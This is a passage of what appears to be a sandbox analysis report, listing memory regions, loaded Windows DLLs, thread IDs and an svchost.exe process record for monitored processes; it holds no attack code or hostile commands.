0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1135 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1136 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1137 start_va = 0x530000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1138 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1139 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1140 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1141 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1142 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1143 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1144 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1145 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1146 start_va = 0x74d80000 end_va = 0x74e11fff monitored = 0 entry_point = 0x74db8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1147 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1148 start_va = 0x773e0000 end_va = 0x7743efff monitored = 0 entry_point = 0x773e4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1149 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1150 start_va = 0x71e20000 end_va = 0x71e27fff monitored = 0 entry_point = 0x71e217b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1151 start_va = 0x6ab50000 end_va = 0x6ab65fff monitored = 0 entry_point = 0x6ab521d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1152 start_va = 0x6a900000 end_va = 0x6a93efff monitored = 0 entry_point = 0x6a9146c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1153 start_va = 0x6a8e0000 end_va = 0x6a8fbfff monitored = 0 entry_point = 0x6a8e4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1154 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1155 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1156 start_va = 0x6a8d0000 end_va = 0x6a8d9fff monitored = 0 entry_point = 0x6a8d28d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1157 start_va = 0x6a790000 end_va = 0x6a8cefff monitored = 0 entry_point = 0x6a7bd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1158 start_va = 0x660000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1159 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1160 start_va = 0x720000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1161 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1162 start_va = 0x8b0000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1163 start_va = 0x4d10000 end_va = 0x610ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d10000" filename = "" Region: id = 1164 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1165 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1166 start_va = 0x1e0000 end_va = 0x1e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 1167 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1168 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1169 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1170 start_va = 0x6110000 end_va = 0x6446fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1171 start_va = 0xa40000 end_va = 0xb29fff monitored = 0 entry_point = 0xa7d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1172 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1173 start_va = 0xa40000 end_va = 0xb1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1174 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1175 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1176 start_va = 0x75220000 end_va = 0x752a3fff monitored = 0 entry_point = 0x75246220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1177 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1178 start_va = 0x6a780000 end_va = 0x6a78cfff monitored = 0 entry_point = 0x6a783520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1179 start_va = 0x69490000 end_va = 0x694f6fff monitored = 0 entry_point = 0x694ab610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1180 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1181 start_va = 0x69440000 end_va = 0x69483fff monitored = 0 entry_point = 0x6945aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1182 start_va = 0x660000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1183 start_va = 0x6a0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1184 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1185 start_va = 0xb20000 end_va = 0xb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1186 start_va = 0xb60000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 1187 start_va = 0xba0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 1188 start_va = 0xbe0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 1189 start_va = 0x69420000 end_va = 0x69430fff monitored = 0 entry_point = 0x69428fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1545 start_va = 0x69360000 end_va = 0x6941efff monitored = 0 entry_point = 0x69391e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1549 start_va = 0x5c0000 end_va = 0x5c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Thread: id = 45 os_tid = 0x974 Thread: id = 46 os_tid = 0x101c Thread: id = 47 os_tid = 0xe5c Thread: id = 48 os_tid = 0xb54 Thread: id = 49 os_tid = 0x1020 Thread: id = 50 os_tid = 0xa70 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x76459000" os_pid = "0x35c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a860" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1190 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1191 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1192 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1193 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1194 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1195 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1196 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1197 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1198 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1199 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1200 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1201 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1202 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1203 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1204 start_va = 0x410000 end_va = 0x411fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 1205 start_va = 0x460000 end_va = 0x460fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1206 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1207 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1208 start_va = 0x540000 end_va = 0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1209 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1210 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1211 start_va = 0x5e0000 end_va = 0x5e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1212 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1213 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1214 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1215 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1216 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1217 start_va = 0x8b0000 end_va = 0x8b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1218 start_va = 0x8d0000 end_va = 0x8d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1219 start_va = 0x8e0000 end_va = 0x8e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1220 start_va = 0x8f0000 end_va = 0x8f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1221 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1222 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1223 start_va = 0xb90000 end_va = 0xf8afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 1224 start_va = 0xf90000 end_va = 0xfdefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 1225 start_va = 0x1010000 end_va = 0x1054fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1226 start_va = 0x1070000 end_va = 0x1076fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1227 start_va = 0x1090000 end_va = 0x1096fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 1228 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 1229 start_va = 0x1240000 end_va = 0x1246fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 1230 start_va = 0x12b0000 end_va = 0x12b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 1231 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1232 start_va = 0x1400000 end_va = 0x1736fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1233 start_va = 0x1740000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 1234 start_va = 0x1840000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 1235 start_va = 0x1940000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 1236 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1237 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 1238 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 1239 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 1240 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1241 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1242 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1243 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1244 start_va = 0x2200000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1245 start_va = 0x2280000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1246 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1247 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1248 start_va = 0x2500000 end_va = 0x25dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1249 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1250 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1251 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1252 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1253 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1254 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1255 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 1256 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 1257 start_va = 0x2e00000 end_va = 0x2e8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1258 start_va = 0x2e90000 end_va = 0x2f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 1259 start_va = 0x3110000 end_va = 0x318ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1260 start_va = 0x3190000 end_va = 0x328ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 1261 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 1262 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 1263 start_va = 0x3600000 end_va = 0x367ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 1264 start_va = 0x3680000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 1265 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 1266 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 1267 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1268 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1269 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 1270 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 1271 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 1272 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1273 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1274 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1275 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 1276 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1277 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 1278 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1279 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1280 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1281 start_va = 0x4700000 end_va = 